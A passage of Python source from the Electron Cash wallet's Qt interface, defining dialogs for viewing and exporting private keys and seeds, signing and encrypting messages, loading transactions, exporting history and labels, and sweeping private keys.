for i in range(self.tabs.count()):
tab = self.tabs.widget(i)
try:
tab.searchable_list.filter(t)
except (AttributeError, TypeError):
pass
def new_contact_dialog(self):
d = WindowModalDialog(self.top_level_window(), _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(280)
line2 = QLineEdit()
line2.setFixedWidth(280)
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_master_public_keys(self):
dialog = WindowModalDialog(self.top_level_window(), _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton()
def show_mpk(index):
mpk_text.setText(mpk_list[index])
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
return _("cosigner") + ' ' + str(key+1)
return ''
labels = [label(i) for i in range(len(mpk_list))]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path) # implicitly also calls stop_wallet
self.update_recently_visited(wallet_path) # this ensures it's deleted from the menu
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
self.close()
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(str(e))
return
from .seed_dialog import SeedDialog, SeedBackupDialog
WhichClass = SeedBackupDialog if self.wallet.storage.get('wallet_seed_needs_backup') else SeedDialog
d = WhichClass(self.top_level_window(), seed, passphrase, wallet=self.wallet)
if d.exec_() == QDialog.Accepted:
            # This branch is in case they were in the SeedBackupDialog; below
            # makes the new non-warning icon (if any) take effect
self.update_status()
d.setParent(None) # gc now rather than later
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
d.setParent(None) # Help Python GC this sooner rather than later
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk = self.wallet.export_private_key(address, password)
except Exception as e:
if util.is_verbose:
traceback.print_exc(file=sys.stderr)
self.show_message(str(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self.top_level_window(), _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel('{}: {}'.format(_("Address"), address)))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
pk_lbl = QLabel(_("Private key") + ':')
vbox.addWidget(pk_lbl)
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton()
# BIP38 Encrypt Button
def setup_encrypt_button():
encrypt_but = QPushButton(_("Encrypt BIP38") + "...")
f = encrypt_but.font(); f.setPointSize(f.pointSize()-1); encrypt_but.setFont(f) # make font -= 1
encrypt_but.setEnabled(bool(bitcoin.Bip38Key.canEncrypt()))
encrypt_but.setToolTip(_("Encrypt this private key using BIP38 encryption")
if encrypt_but.isEnabled() else
_("BIP38 encryption unavailable: install pycryptodomex to enable"))
border_color = ColorScheme.DEFAULT.as_color(False)
border_color.setAlphaF(0.65)
encrypt_but_ss_en = (
keys_e.styleSheet() + (("QPushButton { border: 1px solid %s; border-radius: 6px; padding: 2px; margin: 2px; } "
"QPushButton:hover { border: 1px solid #3daee9; } "
"QPushButton:disabled { border: 1px solid transparent; ") % (border_color.name(QColor.HexArgb)))
)
encrypt_but_ss_dis = ( keys_e.styleSheet() )
encrypt_but.setStyleSheet(encrypt_but_ss_en if encrypt_but.isEnabled() else encrypt_but_ss_dis)
def on_encrypt():
passphrase = self.get_passphrase_dialog(
msg = (
_("Specify a passphrase to use for BIP38 encryption.") + "\n" +
_("Save this passphrase if you save the generated key so you may decrypt it later.")
)
)
if not passphrase:
return
try:
bip38 = str(bitcoin.Bip38Key.encrypt(pk, passphrase))
keys_e.setText(bip38)
encrypt_but.setEnabled(False)
encrypt_but.setStyleSheet(encrypt_but_ss_dis)
pk_lbl.setText( _("BIP38 Key") + ":" )
self.show_message(_("WIF key has been encrypted using BIP38.\n\n"
"You may save this encrypted key to a file or print out its QR code and/or text.\n\n"
"It is strongly encrypted with the passphrase you specified and safe to store electronically. "
"However, the passphrase should be stored securely and not shared with anyone."))
except Exception as e:
if util.is_verbose:
traceback.print_exc(file=sys.stderr)
self.show_error(str(e))
encrypt_but.clicked.connect(on_encrypt)
keys_e.addWidget(encrypt_but, 0)
setup_encrypt_button()
# /BIP38 Encrypt Button
vbox.addWidget(keys_e)
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=address.to_script().hex())
rds_e.addCopyButton()
vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
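    # Sign the entered message with the private key of the given P2PKH address; runs in the wallet's worker thread.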
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
try:
addr = Address.from_string(address)
except:
self.show_message(_('Invalid Bitcoin Cash address.'))
return
if addr.kind != addr.ADDR_P2PKH:
msg_sign = ( _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' +
_('The operation is undefined. Not just in Electron Cash, but in general.') )
self.show_message(_('Cannot sign messages with this type of address.') + '\n\n' + msg_sign)
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(addr):
self.show_message(_('Address not in wallet.'))
return
task = partial(self.wallet.sign_message, addr, message, password)
def show_signed_message(sig):
signature.setText(base64.b64encode(sig).decode('ascii'))
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
try:
address = Address.from_string(address.text().strip())
except:
self.show_message(_('Invalid Bitcoin Cash address.'))
return
message = message.toPlainText().strip().encode('utf-8')
try:
# This can throw on invalid base64
sig = base64.b64decode(signature.toPlainText())
verified = bitcoin.verify_message(address, sig, message)
except:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=None):
d = WindowModalDialog(self.top_level_window(), _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address.to_ui_string() if address else '')
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
self.wallet.thread.add(task, on_success=lambda text: message_e.setText(text.decode('utf-8')))
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
encrypted = bitcoin.encrypt_message(message, pubkey_e.text())
encrypted_e.setText(encrypted.decode('ascii'))
except BaseException as e:
if util.is_verbose:
traceback.print_exc(file=sys.stderr)
self.show_warning(str(e))
def encrypt_message(self, address=None):
d = WindowModalDialog(self.top_level_window(), _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
if not isinstance(pubkey, str):
pubkey = pubkey.to_ui_string()
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
return PasswordDialog(parent, msg).run()
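    # Parse a transaction from raw text; if any inputs spend this wallet's coins, fill in their values.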
def tx_from_text(self, txt):
from electroncash.transaction import tx_from_str
try:
txt_tx = tx_from_str(txt)
tx = Transaction(txt_tx, sign_schnorr=self.wallet.is_schnorr_enabled())
tx.deserialize()
if self.wallet:
my_coins = self.wallet.get_spendable_coins(None, self.config)
my_outpoints = [vin['prevout_hash'] + ':' + str(vin['prevout_n']) for vin in my_coins]
for i, txin in enumerate(tx.inputs()):
outpoint = txin['prevout_hash'] + ':' + str(txin['prevout_n'])
if outpoint in my_outpoints:
my_index = my_outpoints.index(outpoint)
tx._inputs[i]['value'] = my_coins[my_index]['value']
return tx
except:
if util.is_verbose:
traceback.print_exc(file=sys.stderr)
self.show_critical(_("Electron Cash was unable to parse your transaction"))
return
    # Due to the asynchronous nature of the qr reader we need to keep the
    # dialog instance as a member variable to prevent re-entrancy/multiple
    # instances from being presented at once.
_qr_dialog = None
def read_tx_from_qrcode(self):
if self._qr_dialog:
# Re-entrancy prevention -- there is some lag between when the user
# taps the QR button and the modal dialog appears. We want to
# prevent multiple instances of the dialog from appearing, so we
# must do this.
self.print_error("Warning: QR dialog is already presented, ignoring.")
return
if self.gui_object.warn_if_cant_import_qrreader(self):
return
from electroncash import get_config
from .qrreader import QrReaderCameraDialog
data = ''
self._qr_dialog = None
try:
self._qr_dialog = QrReaderCameraDialog(parent=self.top_level_window())
def _on_qr_reader_finished(success: bool, error: str, result):
if self._qr_dialog:
self._qr_dialog.deleteLater(); self._qr_dialog = None
if not success:
if error:
self.show_error(error)
return
if not result:
return
# if the user scanned a bitcoincash URI
if result.lower().startswith(networks.net.CASHADDR_PREFIX + ':') or result.lower().startswith(networks.net.SLPADDR_PREFIX + ':'):
self.pay_to_URI(result)
return
# else if the user scanned an offline signed tx
try:
result = bh2u(bitcoin.base_decode(result, length=None, base=43))
tx = self.tx_from_text(result) # will show an error dialog on error
if not tx:
return
except BaseException as e:
self.show_error(str(e))
return
self.show_transaction(tx)
self._qr_dialog.qr_finished.connect(_on_qr_reader_finished)
self._qr_dialog.start_scan(get_config().get_video_device())
except BaseException as e:
if util.is_verbose:
traceback.print_exc(file=sys.stderr)
self._qr_dialog = None
self.show_error(str(e))
def read_tx_from_file(self, *, fileName = None):
fileName = fileName or self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r", encoding='utf-8') as f:
file_content = f.read()
file_content = file_content.strip()
tx_file_dict = json.loads(str(file_content))
except (ValueError, IOError, OSError, json.decoder.JSONDecodeError) as reason:
self.show_critical(_("Electron Cash was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
tx = self.tx_from_text(file_content)
return tx
def do_process_from_text(self):
from electroncash.transaction import SerializationError
text = text_dialog(self.top_level_window(), _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
try:
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
except SerializationError as e:
self.show_critical(_("Electron Cash was unable to deserialize the transaction:") + "\n" + str(e))
def do_process_from_file(self, *, fileName = None):
from electroncash.transaction import SerializationError
try:
tx = self.read_tx_from_file(fileName=fileName)
if tx:
self.show_transaction(tx)
except SerializationError as e:
self.show_critical(_("Electron Cash was unable to deserialize the transaction:") + "\n" + str(e))
def do_process_from_txid(self, *, txid=None, parent=None):
parent = parent or self
if self.gui_object.warn_if_no_network(parent):
return
from electroncash import transaction
ok = txid is not None
if not ok:
txid, ok = QInputDialog.getText(parent, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
ok, r = self.network.get_raw_tx_for_txid(txid, timeout=10.0)
if not ok:
parent.show_message(_("Error retrieving transaction") + ":\n" + r)
return
tx = transaction.Transaction(r, sign_schnorr=self.wallet.is_schnorr_enabled()) # note that presumably the tx is already signed if it comes from blockchain so this sign_schnorr parameter is superfluous, but here to satisfy my OCD -Calin
self.show_transaction(tx)
def export_bip38_dialog(self):
''' Convenience method. Simply calls self.export_privkeys_dialog(bip38=True) '''
self.export_privkeys_dialog(bip38 = True)
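    # Export all wallet private keys (optionally BIP38-encrypted), computed in a background thread that feeds the dialog.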
@protected
def export_privkeys_dialog(self, password, *, bip38=False):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
if bip38:
self.show_error(_('WARNING: This is a multi-signature wallet.') + '\n' +
_("It cannot be used with BIP38 encrypted keys."))
return
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It can not be "backed up" by simply exporting these private keys.'))
if bip38:
if not bitcoin.Bip38Key.canEncrypt() or not bitcoin.Bip38Key.isFast():
self.show_error(_("BIP38 Encryption is not available. Please install 'pycryptodomex' and restart Electron Cash to enable BIP38."))
return
passphrase = self.get_passphrase_dialog(
msg = (
_("You are exporting your wallet's private keys as BIP38 encrypted keys.") + "\n\n" +
_("You must specify a passphrase to use for encryption.") + "\n" +
_("Save this passphrase so you may decrypt your BIP38 keys later.")
)
)
if not passphrase:
# user cancel
return
bip38 = passphrase # overwrite arg with passphrase.. for use down below ;)
class MyWindowModalDialog(WindowModalDialog):
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
d = MyWindowModalDialog(self.top_level_window(), _('Private keys'))
weak_d = Weak.ref(d)
d.setObjectName('WindowModalDialog - Private Key Export')
destroyed_print_error(d) # track object lifecycle
d.setMinimumSize(850, 300)
vbox = QVBoxLayout(d)
lines = [ _("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties.") ]
if bip38:
            del lines[0]  # No need to scream-WARN them since BIP38 keys *are* encrypted
msg = '\n'.join(lines)
vbox.addWidget(QLabel(msg))
if bip38:
wwlbl = WWLabel()
def set_ww_txt(pf_shown=False):
if pf_shown:
pf_text = ( ("<font face='{monoface}' size=+1><b>".format(monoface=MONOSPACE_FONT))
+ bip38
+ ('</b></font> <a href="hide">{link}</a>'.format(link=_("Hide"))) )
else:
pf_text = '<a href="show">{link}</a>'.format(link=_("Click to show"))
wwlbl.setText(
_("The below keys are BIP38 <i>encrypted</i> using the passphrase: {passphrase}<br>"
"Please <i>write this passphrase down</i> and store it in a secret place, separate from these encrypted keys."
).format(passphrase=pf_text)
)
def toggle_ww_txt(link):
set_ww_txt(link=="show")
set_ww_txt()
wwlbl.linkActivated.connect(toggle_ww_txt)
vbox.addWidget(wwlbl)
e = QTextEdit()
e.setFont(QFont(MONOSPACE_FONT))
e.setWordWrapMode(QTextOption.NoWrap)
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electron-cash-private-keys.csv' if not bip38 else 'electron-cash-bip38-keys.csv'
select_msg = _('Select file to export your private keys to')
box, filename_e, csv_button = filename_field(self.config, defaultname, select_msg)
vbox.addSpacing(12)
vbox.addWidget(box)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
stop = False
def privkeys_thread():
for addr in addresses:
if not bip38:
# This artificial sleep is likely a security / paranoia measure
# to allow user to cancel or to make the process "feel expensive".
# In the bip38 case it's already slow enough so this delay
# is not needed.
time.sleep(0.100)
if stop:
return
try:
privkey = self.wallet.export_private_key(addr, password)
if bip38 and privkey:
privkey = str(bitcoin.Bip38Key.encrypt(privkey, bip38)) # __str__() -> base58 encoded bip38 key
except InvalidPassword:
# See #921 -- possibly a corrupted wallet or other strangeness
privkey = 'INVALID_PASSWORD'
if self.is_slp_wallet: #TODO: also create special prefix for SLP wallet private keys
private_keys[addr.to_full_string(Address.FMT_SLPADDR)] = privkey
else:
private_keys[addr.to_full_string(Address.FMT_CASHADDR)] = privkey
strong_d = weak_d()
try:
if strong_d and not stop:
strong_d.computing_privkeys_signal.emit()
else:
return
finally:
del strong_d
if stop:
return
strong_d = weak_d()
if strong_d:
strong_d.show_privkeys_signal.emit()
def show_privkeys():
nonlocal stop
if stop:
return
s = "\n".join('{:45} {}'.format(addr, privkey)
for addr, privkey in private_keys.items())
e.setText(s)
b.setEnabled(True)
stop = True
thr = None
def on_dialog_closed(*args):
nonlocal stop
stop = True
try: d.computing_privkeys_signal.disconnect()
except TypeError: pass
try: d.show_privkeys_signal.disconnect()
except TypeError: pass
try: d.finished.disconnect()
except TypeError: pass
if thr and thr.is_alive():
thr.join(timeout=1.0) # wait for thread to end for maximal GC mojo
def computing_privkeys_slot():
if stop:
return
e.setText(_("Please wait... {num}/{total}").format(num=len(private_keys),total=len(addresses)))
d.computing_privkeys_signal.connect(computing_privkeys_slot)
d.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
thr = threading.Thread(target=privkeys_thread, daemon=True)
thr.start()
res = d.exec_()
if not res:
stop = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electron Cash was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(str(e))
return
self.show_message(_("Private keys exported."))
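    # Write the exported keys to disk, either as a two-column CSV or as indented JSON.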
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+", encoding='utf-8') as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
labelsFile = self.getOpenFileName(_("Open labels file"), "*.json")
if not labelsFile: return
try:
with open(labelsFile, 'r', encoding='utf-8') as f: # always ensure UTF-8. See issue #1453.
data = f.read()
data = json.loads(data)
if type(data) is not dict or not len(data) or not all(type(v) is str and type(k) is str for k,v in data.items()):
self.show_critical(_("The file you selected does not appear to contain labels."))
return
for key, value in data.items():
self.wallet.set_label(key, value)
self.show_message(_("Your labels were imported from") + " '%s'" % str(labelsFile))
except (IOError, OSError, json.decoder.JSONDecodeError) as reason:
self.show_critical(_("Electron Cash was unable to import your labels.") + "\n" + str(reason))
self.address_list.update()
self.history_list.update()
self.utxo_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
def do_export_labels(self):
labels = self.wallet.labels
try:
fileName = self.getSaveFileName(_("Select file to save your labels"), 'electron-cash_labels.json', "*.json")
if fileName:
with open(fileName, 'w+', encoding='utf-8') as f: # always ensure UTF-8. See issue #1453.
json.dump(labels, f, indent=4, sort_keys=True)
self.show_message(_("Your labels were exported to") + " '%s'" % str(fileName))
except (IOError, os.error) as reason:
self.show_critical(_("Electron Cash was unable to export your labels.") + "\n" + str(reason))
def export_history_dialog(self):
d = WindowModalDialog(self.top_level_window(), _('Export History'))
d.setMinimumSize(400, 200)
vbox = QVBoxLayout(d)
defaultname = os.path.expanduser('~/electron-cash-history.csv')
select_msg = _('Select file to export your wallet transactions to')
box, filename_e, csv_button = filename_field(self.config, defaultname, select_msg)
vbox.addWidget(box)
include_addresses_chk = QCheckBox(_("Include addresses"))
include_addresses_chk.setChecked(True)
include_addresses_chk.setToolTip(_("Include input and output addresses in history export"))
vbox.addWidget(include_addresses_chk)
fee_dl_chk = QCheckBox(_("Fetch accurate fees from network (slower)"))
fee_dl_chk.setChecked(self.is_fetch_input_data())
fee_dl_chk.setEnabled(bool(self.wallet.network))
fee_dl_chk.setToolTip(_("If this is checked, accurate fee and input value data will be retrieved from the network"))
vbox.addWidget(fee_dl_chk)
fee_time_w = QWidget()
fee_time_w.setToolTip(_("The amount of overall time in seconds to allow for downloading fee data before giving up"))
hbox = QHBoxLayout(fee_time_w)
hbox.setContentsMargins(20, 0, 0, 0)
hbox.addWidget(QLabel(_("Timeout:")), 0, Qt.AlignRight)
fee_time_sb = QSpinBox()
fee_time_sb.setMinimum(10)
fee_time_sb.setMaximum(9999)
fee_time_sb.setSuffix(" " + _("seconds"))
fee_time_sb.setValue(30)
fee_dl_chk.clicked.connect(fee_time_w.setEnabled)
fee_time_w.setEnabled(fee_dl_chk.isChecked())
hbox.addWidget(fee_time_sb, 0, Qt.AlignLeft)
hbox.addStretch(1)
vbox.addWidget(fee_time_w)
vbox.addStretch(1)
hbox = Buttons(CancelButton(d), OkButton(d, _('Export')))
vbox.addLayout(hbox)
run_hook('export_history_dialog', self, hbox)
self.update()
res = d.exec_()
d.setParent(None) # for python GC
if not res:
return
filename = filename_e.text()
if not filename:
return
success = False
try:
# minimum 10s time for calc. fees, etc
timeout = max(fee_time_sb.value() if fee_dl_chk.isChecked() else 10.0, 10.0)
success = self.do_export_history(filename, csv_button.isChecked(),
download_inputs=fee_dl_chk.isChecked(),
timeout=timeout,
include_addresses=include_addresses_chk.isChecked())
except Exception as reason:
export_error_label = _("Electron Cash was unable to produce a transaction export.")
self.show_critical(export_error_label + "\n" + str(reason), title=_("Unable to export history"))
else:
if success:
self.show_message(_("Your wallet history has been successfully exported."))
def plot_history_dialog(self):
if plot_history is None:
return
wallet = self.wallet
history = wallet.get_history()
if len(history) > 0:
plt = plot_history(self.wallet, history)
plt.show()
def is_fetch_input_data(self):
''' default on if network.auto_connect is True, otherwise use config value '''
return bool(self.wallet and self.wallet.network and self.config.get('fetch_input_data', self.wallet.network.auto_connect))
def set_fetch_input_data(self, b):
self.config.set_key('fetch_input_data', bool(b))
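    # Export the wallet history to CSV or JSON via a WaitingDialog; returns True on success.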
def do_export_history(self, fileName, is_csv, *, download_inputs=False, timeout=30.0, include_addresses=True):
wallet = self.wallet
if not wallet:
return
dlg = None # this will be set at the bottom of this function
def task():
def update_prog(x):
if dlg: dlg.update_progress(int(x*100))
return wallet.export_history(fx=self.fx,
show_addresses=include_addresses,
decimal_point=self.decimal_point,
fee_calc_timeout=timeout,
download_inputs=download_inputs,
progress_callback=update_prog)
success = False
def on_success(history):
nonlocal success
ccy = (self.fx and self.fx.get_currency()) or ''
has_fiat_columns = history and self.fx and self.fx.show_history() and 'fiat_value' in history[0] and 'fiat_balance' in history[0] and 'fiat_fee' in history[0]
lines = []
for item in history:
if is_csv:
cols = [item['txid'], item.get('label', ''), item['confirmations'], item['value'], item['fee'], item['date']]
if has_fiat_columns:
cols += [item['fiat_value'], item['fiat_balance'], item['fiat_fee']]
if include_addresses:
inaddrs_filtered = (x for x in (item.get('input_addresses') or [])
if Address.is_valid(x))
outaddrs_filtered = (x for x in (item.get('output_addresses') or [])
if Address.is_valid(x))
cols.append( ','.join(inaddrs_filtered) )
cols.append( ','.join(outaddrs_filtered) )
lines.append(cols)
else:
if has_fiat_columns and ccy:
item['fiat_currency'] = ccy # add the currency to each entry in the json. this wastes space but json is bloated anyway so this won't hurt too much, we hope
elif not has_fiat_columns:
# No need to include these fields as they will always be 'No Data'
item.pop('fiat_value', None)
item.pop('fiat_balance', None)
item.pop('fiat_fee', None)
lines.append(item)
with open(fileName, "w+", encoding="utf-8") as f: # ensure encoding to utf-8. Avoid Windows cp1252. See #1453.
if is_csv:
transaction = csv.writer(f, lineterminator='\n')
cols = ["transaction_hash","label", "confirmations", "value", "fee", "timestamp"]
if has_fiat_columns:
cols += [f"fiat_value_{ccy}", f"fiat_balance_{ccy}", f"fiat_fee_{ccy}"] # in CSV mode, we use column names eg fiat_value_USD, etc
if include_addresses:
cols += ["input_addresses", "output_addresses"]
transaction.writerow(cols)
for line in lines:
transaction.writerow(line)
else:
f.write(json.dumps(lines, indent=4))
success = True
# kick off the waiting dialog to do all of the above
dlg = WaitingDialog(self.top_level_window(),
_("Exporting history, please wait ..."),
task, on_success, self.on_error, disable_escape_key=True,
auto_exec=False, auto_show=False, progress_bar=True, progress_min=0, progress_max=100)
dlg.exec_()
        # this will block here in the WaitingDialog event loop... and set success to True on success
return success
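    # Ask the user for private keys (WIF or BIP38) and prepare a transaction sweeping them to one of this wallet's addresses.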
def sweep_key_dialog(self):
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
if not addresses:
self.show_warning(_('Wallet has no address to sweep to'))
return
d = WindowModalDialog(self.top_level_window(), title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
        bip38_warn_label = QLabel(_("<b>BIP38 support is disabled because a requisite library is not installed.</b> Please install 'pycryptodomex' or omit BIP38 private keys (private keys starting in 6P...). Decrypt keys to WIF format (starting with 5, K, or L) in order to sweep."))
bip38_warn_label.setWordWrap(True)
bip38_warn_label.setHidden(True)
vbox.addWidget(bip38_warn_label)
extra = ""
if bitcoin.is_bip38_available():
extra += " " + _('or BIP38 keys')
vbox.addWidget(QLabel(_("Enter private keys") + extra + " :"))
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
h, addr_combo = address_combo(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
sweep_button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), sweep_button))
def get_address_text():
return addr_combo.currentText()
def get_priv_keys():
return keystore.get_private_keys(keys_e.toPlainText(), allow_bip38=True)
def has_bip38_keys_but_no_bip38():
if bitcoin.is_bip38_available():
return False
keys = [k for k in keys_e.toPlainText().split() if k]
return any(bitcoin.is_bip38_key(k) for k in keys)
def enable_sweep():
bad_bip38 = has_bip38_keys_but_no_bip38()
sweepok = bool(get_address_text() and not bad_bip38 and get_priv_keys())
sweep_button.setEnabled(sweepok)
bip38_warn_label.setHidden(not bad_bip38)
keys_e.textChanged.connect(enable_sweep)
enable_sweep()
res = d.exec_()
d.setParent(None)
if not res:
return
try:
self.do_clear()
keys = get_priv_keys()
bip38s = {}
for i, k in enumerate(keys):
if bitcoin.is_bip38_key(k):
bip38s[k] = i
if bip38s:
# For all the BIP38s detected, prompt for password
from .bip38_importer import Bip38Importer
d2 = Bip38Importer(bip38s.keys(), parent=self.top_level_window())
d2.exec_()
d2.setParent(None)
if d2.decoded_keys:
for k,tup in d2.decoded_keys.items():
wif, adr = tup
# rewrite the keys they specified with the decrypted WIF in the keys list for sweep_preparations to work below...
i = bip38s[k]
keys[i] = wif
else:
self.show_message(_("User cancelled"))
return
coins, keypairs = sweep_preparations(keys, self.network)
self.tx_external_keypairs = keypairs
self.payto_e.setText(get_address_text())
self.spend_coins(coins)
self.spend_max()
except BaseException as e:
self.show_message(str(e))
return
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
self.warn_if_watching_only()
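    # Generic import helper: applies func to each whitespace-separated entry and reports successes and failures.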
def _do_import(self, title, msg, func):
text = text_dialog(self.top_level_window(), title, msg + ' :', _('Import'),
allow_multi=True)
if not text:
return
bad, bad_info = [], []
good = []
for key in str(text).split():
try:
addr = func(key)
good.append(addr)
except BaseException as e:
bad.append(key)
bad_info.append("{}: {}".format(key, str(e)))
continue
if good:
self.show_message(_("The following addresses were added") + ':\n' + '\n'.join(good))
if bad:
